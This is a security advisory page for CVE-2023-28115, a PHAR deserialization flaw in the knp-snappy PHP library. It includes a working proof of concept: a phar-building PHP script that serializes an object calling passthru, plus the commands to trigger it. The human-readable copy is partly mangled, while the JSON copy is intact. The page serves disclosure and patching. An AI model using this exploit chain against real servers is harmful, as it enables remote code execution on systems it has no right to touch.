ghsa-gq6w-q6wh-jggc
Vulnerability from github
Published
2023-03-17 18:24
Modified
2023-03-20 13:59
Severity ?
VLAI Severity ?
Summary
PHAR deserialization allowing remote code execution
Details
Description
snappy is vulnerable to PHAR deserialization due to a lack of checking on the protocol before passing it into the file_exists() function. If an attacker can upload files of any type to the server he can pass in the phar:// protocol to unserialize the uploaded file and instantiate arbitrary PHP objects. This can lead to remote code execution especially when snappy is used with frameworks with documented POP chains like Laravel/Symfony vulnerable developer code. If user can control the output file from the generateFromHtml() function, it will invoke deserialization.
Proof of Concept
Install Snappy via composer require knplabs/knp-snappy. After that, under snappy directory, create an index.php file with this vulnerable code.
```php
callback, $this->fileName); } } $snappy = new Pdf('/usr/local/bin/wkhtmltopdf'); // generate pdf from html content and save it at phar://poc.phar $snappy->generateFromHtml('Bill
You owe me money, dude.
', 'phar://poc.phar'); ``` As an attacker, we going to generate the malicious phar using this script. ```php callback = "passthru"; $dummy->fileName = "uname -a > pwned"; //our payload // Delete any existing PHAR archive with that name @unlink("poc.phar"); // Create a new archive $poc = new Phar("poc.phar"); // Add all write operations to a buffer, without modifying the archive on disk $poc->startBuffering(); // Set the stub $poc->setStub("setMetadata($dummy); // Stop buffering and write changes to disk $poc->stopBuffering(); ?>```
Then run these command to generate the file
php
php --define phar.readonly=0 generate_phar.php
Then execute index.php with php index.php. You will see a file named pwned will be created. Noted that attacker can upload a file with any extension such as .png or .jpeg. So poc.jpeg also will do the trick.
Impact
This vulnerability is capable of remote code execution if Snappy is used with frameworks or developer code with vulnerable POP chains.
Occurences
References
{
"affected": [
{
"package": {
"ecosystem": "Packagist",
"name": "knplabs/knp-snappy"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.4.2"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2023-28115"
],
"database_specific": {
"cwe_ids": [
"CWE-502"
],
"github_reviewed": true,
"github_reviewed_at": "2023-03-17T18:24:24Z",
"nvd_published_at": "2023-03-17T22:15:00Z",
"severity": "CRITICAL"
},
"details": "## Description\n\nsnappy is vulnerable to PHAR deserialization due to a lack of checking on the protocol before passing it into the `file_exists()` function. If an attacker can upload files of any type to the server he can pass in the phar:// protocol to unserialize the uploaded file and instantiate arbitrary PHP objects. This can lead to remote code execution especially when snappy is used with frameworks with documented POP chains like Laravel/Symfony vulnerable developer code. If user can control the output file from the `generateFromHtml()` function, it will invoke deserialization.\n\n## Proof of Concept\n\nInstall Snappy via composer require `knplabs/knp-snappy`. After that, under snappy directory, create an `index.php` file with this vulnerable code.\n\n```php\n\u003c?php\n// index.php\n\n// include autoloader\nrequire __DIR__ . \u0027/vendor/autoload.php\u0027;\n\n// reference the snappy namespace\nuse Knp\\Snappy\\Pdf;\n\n// vulnerable object\nclass VulnerableClass {\n public $fileName;\n public $callback;\n\n function __destruct() {\n call_user_func($this-\u003ecallback, $this-\u003efileName);\n }\n}\n\n$snappy = new Pdf(\u0027/usr/local/bin/wkhtmltopdf\u0027);\n// generate pdf from html content and save it at phar://poc.phar\n$snappy-\u003egenerateFromHtml(\u0027\u003ch1\u003eBill\u003c/h1\u003e\u003cp\u003eYou owe me money, dude.\u003c/p\u003e\u0027, \u0027phar://poc.phar\u0027);\n```\n\nAs an attacker, we going to generate the malicious phar using this script.\n\n```php\n\u003c?php\n// generate_phar.php\n\nclass VulnerableClass { }\n// Create a new instance of the Dummy class and modify its property\n$dummy = new VulnerableClass();\n$dummy-\u003ecallback = \"passthru\";\n$dummy-\u003efileName = \"uname -a \u003e pwned\"; //our payload\n\n// Delete any existing PHAR archive with that name\n@unlink(\"poc.phar\");\n\n// Create a new archive\n$poc = new Phar(\"poc.phar\");\n\n// Add all write operations to a buffer, without modifying the archive on disk\n$poc-\u003estartBuffering();\n\n// Set the stub\n$poc-\u003esetStub(\"\u003c?php echo \u0027Here is the STUB!\u0027; __HALT_COMPILER();\");\n\n// Add a new file in the archive with \"text\" as its content\n$poc[\"file\"] = \"text\";\n\n// Add the dummy object to the metadata. This will be serialized\n$poc-\u003esetMetadata($dummy);\n\n// Stop buffering and write changes to disk\n$poc-\u003estopBuffering();\n?\u003e\n```\n\nThen run these command to generate the file\n\n```php\nphp --define phar.readonly=0 generate_phar.php\n```\n\nThen execute index.php with `php index.php`. You will see a file named `pwned` will be created. Noted that attacker can upload a file with any extension such as .png or .jpeg. So poc.jpeg also will do the trick.\n\n## Impact\n\nThis vulnerability is capable of remote code execution if Snappy is used with frameworks or developer code with vulnerable POP chains.\n\n## Occurences\n\n\u003chttps://github.com/KnpLabs/snappy/blob/5126fb5b335ec929a226314d40cd8dad497c3d67/src/Knp/Snappy/AbstractGenerator.php#L670\u003e\n\n## References\n\n- \u003chttps://huntr.dev/bounties/0bdddc12-ff67-4815-ab9f-6011a974f48e/\u003e",
"id": "GHSA-gq6w-q6wh-jggc",
"modified": "2023-03-20T13:59:30Z",
"published": "2023-03-17T18:24:24Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/KnpLabs/snappy/security/advisories/GHSA-gq6w-q6wh-jggc"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-28115"
},
{
"type": "WEB",
"url": "https://github.com/KnpLabs/snappy/pull/469"
},
{
"type": "WEB",
"url": "https://github.com/KnpLabs/snappy/commit/1ee6360cbdbea5d09705909a150df7963a88efd6"
},
{
"type": "WEB",
"url": "https://github.com/KnpLabs/snappy/commit/b66f79334421c26d9c244427963fa2d92980b5d3"
},
{
"type": "WEB",
"url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/knplabs/knp-snappy/CVE-2023-28115.yaml"
},
{
"type": "PACKAGE",
"url": "https://github.com/KnpLabs/snappy"
},
{
"type": "WEB",
"url": "https://github.com/KnpLabs/snappy/blob/5126fb5b335ec929a226314d40cd8dad497c3d67/src/Knp/Snappy/AbstractGenerator.php#L670"
},
{
"type": "WEB",
"url": "https://github.com/KnpLabs/snappy/releases/tag/v1.4.2"
},
{
"type": "ADVISORY",
"url": "https://github.com/advisories/GHSA-gq6w-q6wh-jggc"
},
{
"type": "WEB",
"url": "https://huntr.dev/bounties/0bdddc12-ff67-4815-ab9f-6011a974f48e"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "PHAR deserialization allowing remote code execution"
}
Loading…
Loading…
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
- Confirmed: The vulnerability is confirmed from an analyst perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
- Patched: This vulnerability was successfully patched by the user reporting the sighting.
- Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
- Not confirmed: The user expresses doubt about the veracity of the vulnerability.
- Not patched: This vulnerability was not successfully patched by the user reporting the sighting.
Loading…
Loading…